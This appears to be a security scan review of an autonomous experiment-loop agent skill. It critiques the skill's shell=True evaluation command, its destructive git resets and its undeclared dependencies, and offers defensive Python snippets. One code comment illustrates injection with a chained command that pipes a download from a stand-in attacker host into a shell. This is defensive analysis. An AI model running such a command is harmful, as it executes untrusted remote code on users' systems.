Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
Autoresearch Agent
v2.1.1 · Autonomous experiment loop that optimizes any file by a measurable metric. Inspired by Karpathy's autoresearch. The agent edits a target file, runs a fixed e...
by Alireza Rezvani (@alirezarezvani)
License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan (OpenClaw): Suspicious (high confidence)

Purpose & Capability
The skill declares no required binaries or credentials, but the included evaluators and scripts clearly rely on external tools: git (used heavily), a Python runtime, build tools (npm/docker) in some evaluators, /usr/bin/time on Linux/macOS, pytest, and optional LLM CLI tools (claude/codex/gemini). Declaring none in the registry metadata is inconsistent with the code and setup examples. The binaries themselves are proportional to the stated goal (running local experiments), but their absence from the declared requirements is a mismatch that can cause surprise or misuse.
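Before running the skill, you can check whether the undeclared tools are actually present. A minimal sketch (the binary list below is reconstructed from this review, not from the skill's metadata):

```python
import shutil

# Binaries the bundled scripts appear to rely on despite the registry
# declaring none; list assumed from this scan report, not authoritative.
UNDECLARED_BINARIES = ["git", "python3", "npm", "docker", "pytest", "claude"]

def missing_binaries(names):
    """Return the subset of names not found on PATH."""
    return [n for n in names if shutil.which(n) is None]

if __name__ == "__main__":
    missing = missing_binaries(UNDECLARED_BINARIES)
    if missing:
        print("Not on PATH:", ", ".join(missing))
    else:
        print("All expected binaries present.")
```

Anything the check reports as missing will cause the corresponding evaluator to fail at runtime rather than at install time.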
Instruction Scope
SKILL.md and the agent docs instruct the AI to read config/program/results, edit a single target file, commit, and call scripts/run_experiment.py, which runs a user-provided eval command with shell=True. Running arbitrary eval_cmd strings (with pipes and redirects) in the project root grants broad local execution power, and the run_experiment script runs git reset --hard HEAD~1 to revert failed experiments. The human-facing rules ("Never modify files outside the target file") are not enforced by the runtime; a faulty or compromised agent could break that constraint. Overall the instruction scope aligns with optimizing files but includes high-risk operations (arbitrary shell eval, destructive git resets).
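The skill's run_experiment.py is not reproduced here; the sketch below only illustrates the pattern the review describes and one way to constrain it. The function name is hypothetical:

```python
import shlex
import subprocess

# The review reports that the skill runs the user's eval command roughly as:
#   subprocess.run(eval_cmd, shell=True)
# With shell=True, pipes, redirects, and ";"-chained commands all execute,
# so a misconfigured eval_cmd like "pytest -q; curl evil.example | sh"
# would run both halves.

def run_eval_constrained(eval_cmd: str) -> int:
    """Hypothetical safer variant: split into argv and skip the shell.
    This blocks pipes, redirects, and command chaining, but also rejects
    any eval_cmd that legitimately needs shell features."""
    argv = shlex.split(eval_cmd)
    return subprocess.run(argv).returncode
```

The trade-off is deliberate: dropping shell=True removes the skill's flexibility to accept arbitrary one-liners, which is exactly the capability this scan flags as high risk.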
Install Mechanism
There is no external install mechanism in the registry (instruction-only), which lowers risk. The bundle includes scripts the user runs (setup_experiment.py) to create .autoresearch/ in the project or in ~/, so code is written to disk only when the user runs the setup script. The included files use no external downloads or obscure installers.
Credentials
The skill declares no required environment variables or credentials, but several evaluators implicitly require external tooling and possibly credentials: the LLM judges call a CLI tool named 'claude' (or 'codex'/'gemini'), which implies the user has a configured CLI and subscription; some evaluators call docker or npm; memory- and time-based evaluators assume system utilities. Because these requirements are implicit rather than declared, users may unintentionally run experiments that hit networked services or incur paid LLM calls. The number and sensitivity of the external dependencies is reasonable for the purpose, but the lack of explicit declaration is a proportionality/expectations problem.
Persistence & Privilege
The skill does not request permanent platform-wide privileges (always: false). However, it expects local filesystem and git access: it will create or modify .autoresearch/, check out branches, create commits, and perform hard resets (git reset --hard HEAD~1). These are normal for an autoresearch loop but impactful: they rewrite repository history and the working tree. SKILL.md instructs the agent not to push to remote, but that is advisory, not programmatically enforced.
What to consider before installing
This skill is coherent with its stated goal (autonomous experiment loops) but has several practical and security caveats you should consider before installing or running it:
- Declared requirements are incomplete: the code expects git, Python, build tools (npm/docker), /usr/bin/time, pytest, and optionally an LLM CLI (e.g., 'claude'). Ensure those tools exist and you are comfortable with them being invoked.
- Arbitrary evaluation commands: experiments run a user-provided evaluate_cmd via shell=True (allowing pipes, redirects, chained commands). Only use evaluate_cmd values you trust; do not point evaluate_cmd at untrusted scripts or remote commands. If you or the agent misconfigures evaluate_cmd it could execute unexpected local or network actions.
- Git is destructive by design: the runner will commit experimental changes and perform hard resets (git reset --hard HEAD~1) to discard non-improvements. Back up important branches and avoid running this on repositories where automatic commits/resets would be harmful. Consider running experiments in a disposable clone or dedicated branch.
- LLM evaluators are implicit: if you plan to use the marketing/content evaluators, confirm you have a CLI tool configured (and understand any cost or data-sharing implications). The skill does not declare nor request credentials, so the tool/credentials are expected to already be present in your environment.
- Start in a safe sandbox: run setup and a few dry-runs on a test repository (or with --dry-run) to observe behavior. Review and optionally edit the evaluator scripts (they are labeled DO NOT MODIFY after experiments start) to ensure they do only what you expect.
- Consider access control: because the agent is allowed to run autonomously, keep the skill user-invocation and scheduling limited to trusted contexts (don't enable it on repos with sensitive data unless you audited the eval_cmd and scripts).
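The "disposable clone" advice above can be automated. A minimal sketch (the helper name is hypothetical; requires git on PATH):

```python
import subprocess
import tempfile
from pathlib import Path

def disposable_clone(repo_path: str) -> Path:
    """Clone repo_path into a throwaway directory so the agent's automatic
    commits and `git reset --hard` cannot touch the original working tree."""
    sandbox = Path(tempfile.mkdtemp(prefix="autoresearch-sandbox-"))
    dest = sandbox / "repo"
    subprocess.run(
        ["git", "clone", "--quiet", repo_path, str(dest)],
        check=True,  # raise if the clone fails instead of continuing
    )
    return dest
```

Point the skill's setup at the returned path; when the experiment run is over, delete the sandbox directory and the original repository is untouched.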
If you want to proceed, first run the setup in an isolated repo, confirm the required CLIs are present, and inspect evaluate_cmd and the evaluator configuration thoroughly. If needed, I can highlight every place the code executes shell commands and list the exact binaries the scripts call so you can validate them one by one.
Like a lobster shell, security has layers: review code before you run it.
